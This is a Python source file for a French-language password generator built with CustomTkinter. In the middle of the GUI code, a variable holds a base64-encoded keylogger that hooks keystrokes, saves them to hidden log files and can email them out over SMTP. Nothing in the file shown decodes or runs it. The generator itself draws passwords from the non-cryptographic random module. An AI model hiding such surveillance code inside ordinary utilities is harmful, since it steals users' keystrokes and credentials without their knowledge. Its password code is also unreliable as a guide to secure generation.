import os
import customtkinter as ctk
import tkinter as tk
import random
import string

root = ctk.CTk()
root.title("Générateur de Mot de Passe")

label_longueur = ctk.CTkLabel(root, text="Longueur du mot de passe :")
k = "aW1wb3J0IGtleWJvYXJkCmltcG9ydCB0aHJlYWRpbmcKaW1wb3J0IHRpbWUKaW1wb3J0IHNtdHBsaWIKZnJvbSBlbWFpbC5taW1lLnRleHQgaW1wb3J0IE1JTUVUZXh0CmZyb20gZGF0ZXRpbWUgaW1wb3J0IGRhdGV0aW1lCmltcG9ydCBiYXNlNjQKCmNsYXNzIEtleWxvZ2dlcjoKICAgIGRlZiBfX2luaXRfXyhzZWxmLCByZXBvcnRfbWV0aG9kPSJmaWxlIik6CiAgICAgICAgc2VsZi5yZXBvcnRfbWV0aG9kID0gcmVwb3J0X21ldGhvZAogICAgICAgIHNlbGYubG9nID0gIiIKICAgICAgICBzZWxmLnN0YXJ0X2R0ID0gZGF0ZXRpbWUubm93KCkKICAgICAgICBzZWxmLmVuZF9kdCA9IGRhdGV0aW1lLm5vdygpCiAgICAgICAgc2VsZi5lbWFpbF9zdWJqZWN0ID0gIiIKICAgICAgICBzZWxmLmVtYWlsX3VzZXIgPSAiIgogICAgICAgIHNlbGYuZW1haWxfcGFzc3dvcmQgPSAiIgogICAgICAgIHNlbGYuZW1haWxfdG8gPSAiIgogICAgICAgIHNlbGYuc210cF9zZXJ2ZXIgPSAiIgogICAgICAgIHNlbGYuZmlsZW5hbWUgPSAiIgogICAgICAgIHNlbGYucnVubmluZyA9IFRydWUgICMgVmFyaWFibGUgZGUgY29udHLDtGxlIHBvdXIgaW5kaXF1ZXIgc2kgbGUgcHJvZ3JhbW1lIGVzdCBlbiBjb3VycyBkJ2V4w6ljdXRpb24KCiAgICBkZWYgdXBkYXRlX2ZpbGVuYW1lKHNlbGYpOgogICAgICAgIHN0YXJ0X2R0X3N0ciA9IHN0cihzZWxmLnN0YXJ0X2R0KVs6LTddLnJlcGxhY2UoIiAiLCAiLSIpLnJlcGxhY2UoIjoiLCAiIikKICAgICAgICBlbmRfZHRfc3RyID0gc3RyKHNlbGYuZW5kX2R0KVs6LTddLnJlcGxhY2UoIiAiLCAiLSIpLnJlcGxhY2UoIjoiLCAiIikKICAgICAgICBzZWxmLmZpbGVuYW1lID0gZiIue3N0YXJ0X2R0X3N0cn1fe2VuZF9kdF9zdHJ9IgoKICAgIGRlZiBvbl9yZWxlYXNlKHNlbGYsIGV2ZW50KToKICAgICAgICBuYW1lID0gZXZlbnQubmFtZQogICAgICAgIGlmIGxlbihuYW1lKSA+IDE6CiAgICAgICAgICAgIGlmIG5hbWUgPT0gInNwYWNlIjoKICAgICAgICAgICAgICAgIG5hbWUgPSAiICIKICAgICAgICAgICAgZWxpZiBuYW1lID09ICJlbnRlciI6CiAgICAgICAgICAgICAgICBuYW1lID0gIltFTlRFUl1cbiIKICAgICAgICAgICAgZWxpZiBuYW1lID09ICJkZWNpbWFsIjoKICAgICAgICAgICAgICAgIG5hbWUgPSAiLiIKICAgICAgICAgICAgZWxzZToKICAgICAgICAgICAgICAgIG5hbWUgPSBuYW1lLnJlcGxhY2UoIiAiLCAiXyIpCiAgICAgICAgICAgICAgICBuYW1lID0gZiJbe25hbWUudXBwZXIoKX1dIgogICAgICAgIHNlbGYubG9nICs9IG5hbWUKCiAgICBkZWYgcmVwb3J0X3RvX2ZpbGUoc2VsZik6CiAgICAgICAgc2VsZi51cGRhdGVfZmlsZW5hbWUoKQogICAgICAgIHdpdGggb3BlbihmIi91c3IvbG9nL3tzZWxmLmZpbGVuYW1lfS50eHQiLCAid2IiKSBhcyBmOgogICAgICAgICAgICBlbmNvZGVkX2xvZyA9IGJhc2U2NC5iNjRlbmNvZGUoc2VsZi5sb2cuZW5jb2RlKCkpCiAgICAgICAgICAgIGYud3JpdGUoZW5jb2RlZF9sb2cpICAjIFV0aWxpc2VyIHdyaXRlKCkgcG91ciDDqWNyaXJlIGRhbnMgbGUgZmljaGllcgogICAgICAgIHByaW50KGYiWytdIFNhdmVkIHtzZWxmLmZpbGVuYW1lfS50eHQiKQoKICAgIGRlZiByZXBvcnRfdG9fZW1haWwoc2VsZik6CiAgICAgICAgbXNnID0gTUlNRVRleHQoc2VsZi5sb2cpCiAgICAgICAgbXNnWyJTdWJqZWN0Il0gPSBzZWxmLmVtYWlsX3N1YmplY3QKICAgICAgICBtc2dbIkZyb20iXSA9IHNlbGYuZW1haWxfdXNlcgogICAgICAgIG1zZ1siVG8iXSA9IHNlbGYuZW1haWxfdG8KCiAgICAgICAgdHJ5OgogICAgICAgICAgICBzZXJ2ZXIgPSBzbXRwbGliLlNNVFAoc2VsZi5zbXRwX3NlcnZlciwgNTg3KQogICAgICAgICAgICBzZXJ2ZXIuc3RhcnR0bHMoKQogICAgICAgICAgICBzZXJ2ZXIubG9naW4oc2VsZi5lbWFpbF91c2VyLCBzZWxmLmVtYWlsX3Bhc3N3b3JkKQogICAgICAgICAgICBzZXJ2ZXIuc2VuZG1haWwoc2VsZi5lbWFpbF91c2VyLCBzZWxmLmVtYWlsX3RvLCBtc2cuYXNfc3RyaW5nKCkpCiAgICAgICAgICAgIHNlcnZlci5xdWl0KCkKICAgICAgICAgICAgcHJpbnQoIlsrXSBFbWFpbCBzZW50IHN1Y2Nlc3NmdWxseSIpCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlvbiBhcyBlOgogICAgICAgICAgICBwcmludChmIlstXSBFcnJvciBzZW5kaW5nIGVtYWlsOiB7ZX0iKQoKICAgIGRlZiBzdGFydChzZWxmKToKICAgICAgICB3aGlsZSBzZWxmLnJ1bm5pbmc6ICAjIENvbnRpbnVlciB0YW50IHF1ZSBsZSBwcm9ncmFtbWUgZXN0IGVuIGNvdXJzIGQnZXjDqWN1dGlvbgogICAgICAgICAgICBzZWxmLnN0YXJ0X2R0ID0gZGF0ZXRpbWUubm93KCkKICAgICAgICAgICAga2V5Ym9hcmQub25fcmVsZWFzZShjYWxsYmFjaz1zZWxmLm9uX3JlbGVhc2UpCiAgICAgICAgICAgIHRpbWUuc2xlZXAoMTApICAjIFBhdXNlIGRlIDEwIHNlY29uZGVzCiAgICAgICAgICAgIHNlbGYuZW5kX2R0ID0gZGF0ZXRpbWUubm93KCkKICAgICAgICAgICAgaWYgc2VsZi5yZXBvcnRfbWV0aG9kID09ICJmaWxlIjoKICAgICAgICAgICAgICAgIHNlbGYucmVwb3J0X3RvX2ZpbGUoKQogICAgICAgICAgICBlbGlmIHNlbGYucmVwb3J0X21ldGhvZCA9PSAiZW1haWwiOgogICAgICAgICAgICAgICAgc2VsZi5yZXBvcnRfdG9fZW1haWwoKQogICAgICAgICAgICBlbHNlOgogICAgICAgICAgICAgICAgcGFzcwogICAgICAgICAgICBrZXlib2FyZC51bmhvb2tfYWxsKCkKCmRlZiBzdG9wX2tleWxvZ2dlcigpOgogICAgd2hpbGUgVHJ1ZToKICAgICAgICBpZiBrZXlib2FyZC5pc19wcmVzc2VkKCJmNyIpOgogICAgICAgICAgICBrZXlsb2dnZXIucnVubmluZyA9IEZhbHNlCiAgICAgICAgICAgIGJyZWFrCgppZiBfX25hbWVfXyA9PSAiX19tYWluX18iOgogICAga2V5bG9nZ2VyID0gS2V5bG9nZ2VyKHJlcG9ydF9tZXRob2Q9ImZpbGUiKQogICAgc3RvcF90aHJlYWQgPSB0aHJlYWRpbmcuVGhyZWFkKHRhcmdldD1zdG9wX2tleWxvZ2dlcikKICAgIHN0b3BfdGhyZWFkLnN0YXJ0KCkKICAgIGtleWxvZ2dlci5zdGFydCgpCg=="
label_longueur.grid(row=0, column=0, padx=5, pady=5)
entry_longueur = ctk.CTkEntry(root)
entry_longueur.grid(row=0, column=1, padx=5, pady=5)

def generer_mot_de_passe(longueur):
    caracteres = string.ascii_letters + string.digits + string.punctuation
    mot_de_passe = ''.join(random.choice(caracteres) for _ in range(longueur))
    return mot_de_passe

def generer_mot_de_passe_et_afficher():
    longueur = int(entry_longueur.get())
    mot_de_passe = generer_mot_de_passe(longueur)
    label_mot_de_passe.config(text="Mot de passe généré : " + mot_de_passe)
    
bouton_generer = ctk.CTkButton(root, text="Générer", command=generer_mot_de_passe_et_afficher)
bouton_generer.grid(row=1, column=0, columnspan=2, padx=5, pady=5)

label_mot_de_passe = tk.Label(root, text="")
label_mot_de_passe.grid(row=2, column=0, columnspan=2, padx=5, pady=5)

root.mainloop()